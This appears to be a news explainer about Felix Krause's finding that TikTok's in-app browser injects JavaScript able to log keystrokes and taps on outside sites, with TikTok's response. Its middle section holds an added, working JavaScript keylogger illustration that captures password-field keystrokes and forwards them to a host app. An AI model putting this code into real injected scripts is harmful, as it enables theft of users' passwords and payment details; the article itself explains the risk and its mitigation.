TikTok is one of the most popular social media platforms. It allows users to record videos and share them on the platform worldwide. However, a security researcher found that TikTok's in-app browser injects JavaScript that can capture everything a user types on a third-party website, including passwords and credit card numbers. Here are the details.
TikTok's in-app browser includes spy code
Some popular social media apps don't send users out of the app when they tap a link. Instead, they open the link in their own small in-app browser. TikTok works this way too. Software researcher Felix Krause discovered that TikTok inserts code into the pages opened in that browser. This code can monitor users' activity on outside websites, including every keyboard input and tap. The company denies that it uses the code for malicious purposes.
TikTok doesn't let users open links in the phone's own browser, such as Safari or Chrome; it uses the TikTok-made in-app browser instead. Because that browser is under its control, the platform can track users' activity by injecting lines of JavaScript into the websites visited within the app. With that JavaScript in place, TikTok can monitor users' keyboard input and their taps on buttons and links.
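The following is an added illustration of the mechanism described above; it is not TikTok's code and not Felix Krause's. It shows what a script becomes able to do once an in-app browser injects it into a visited page: capture-phase listeners on `document` receive every keystroke and tap, password fields included, and can forward them to the host app. The `postToHost` callback stands in for a native bridge such as WKWebView's `window.webkit.messageHandlers.<name>.postMessage`; the handler name, the fake document, and the typed sample input are all constructed for the example so it runs under Node without a browser.

```javascript
// Added illustration, not TikTok's code: what a script injected by an
// in-app browser can do once it runs inside the visited page.

// Summarise the element that received an event (tag, input type, name, label).
function describeTarget(el) {
  if (!el) return { tag: null, type: null, name: null, text: null };
  const tag = String(el.tagName || '').toLowerCase();
  const clickable = tag === 'a' || tag === 'button';
  return {
    tag,
    type: el.type || null,
    name: el.name || el.id || null,
    text: clickable ? String(el.textContent || '').trim().slice(0, 40) : null,
  };
}

// Install listeners the way an injected script could. `postToHost` stands in
// for a native bridge such as WKWebView's
// window.webkit.messageHandlers.<handlerName>.postMessage (the handler name
// is an assumption; the real one is whatever the app registers).
function installInputMonitor(doc, postToHost) {
  const seen = [];
  const record = (rec) => { seen.push(rec); postToHost(rec); };

  // Third argument `true` = capture phase on `document`: this listener runs
  // before any handler the site attached to the input itself, so the site
  // cannot suppress it with stopPropagation(), and keydown fires for
  // <input type="password"> exactly as for any other field.
  doc.addEventListener('keydown', (ev) => {
    record({ kind: 'key', key: ev.key, target: describeTarget(ev.target) });
  }, true);

  doc.addEventListener('click', (ev) => {
    record({ kind: 'tap', target: describeTarget(ev.target) });
  }, true);

  return seen;
}

// Constructed stand-in for the DOM so the example runs under Node with no browser.
function makeFakeDocument() {
  const listeners = new Map();
  return {
    addEventListener(type, fn) {
      if (!listeners.has(type)) listeners.set(type, []);
      listeners.get(type).push(fn);
    },
    dispatch(type, ev) {
      for (const fn of listeners.get(type) || []) fn(ev);
    },
  };
}

// Simulate a user typing a password and tapping "Log in" on a third-party
// site opened in the in-app browser; returns what the host app received.
function simulateLogin(password) {
  const sentToHost = [];
  const doc = makeFakeDocument();
  installInputMonitor(doc, (rec) => sentToHost.push(rec));

  const passwordField = { tagName: 'INPUT', type: 'password', name: 'password' };
  for (const ch of password) doc.dispatch('keydown', { key: ch, target: passwordField });
  doc.dispatch('click', { target: { tagName: 'BUTTON', textContent: ' Log in ' } });
  return sentToHost;
}

// Reassemble the typed password from the forwarded key events.
function recoverTypedText(records) {
  return records
    .filter((r) => r.kind === 'key' && r.target.type === 'password')
    .map((r) => r.key)
    .join('');
}

if (typeof require !== 'undefined' && require.main === module) {
  const records = simulateLogin('correct horse');
  console.log(JSON.stringify(records, null, 2));
  console.log('host app recovered:', recoverTypedText(records));
}
```

Two points for practitioners follow from this. First, a script injected by the embedding app (on iOS via a WKUserScript, for instance) runs in the page's JavaScript context before the page's own code and leaves no `<script>` element in the DOM, so a website cannot reliably detect or block it from inside the page. Second, the browser does not treat password fields specially for key events, so the "debugging and performance monitoring" data channel and a keylogger share the same API; which one it is depends entirely on what the app does with the events. The only reliable mitigation for a user is to open the link in the system browser, where the app has no code on the page.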
Felix Krause said, “This was an active choice the company made. This is a non-trivial engineering task. This does not happen by mistake or randomly.” TikTok spokesperson Maureen Shanahan responded, “Like other platforms, we use an in-app browser to provide an optimal user experience, but the JavaScript code in question is used only for debugging, troubleshooting, and performance monitoring of that experience — like checking how quickly a page loads or whether it crashes.”
Felix Krause also launched a tool called InAppBrowser. It lists apps such as TikTok, Instagram, Facebook Messenger, and Facebook that use an in-app browser for outside links. With this tool, users can see the tracking code, website metadata, and JavaScript files that an app injects into the pages they visit.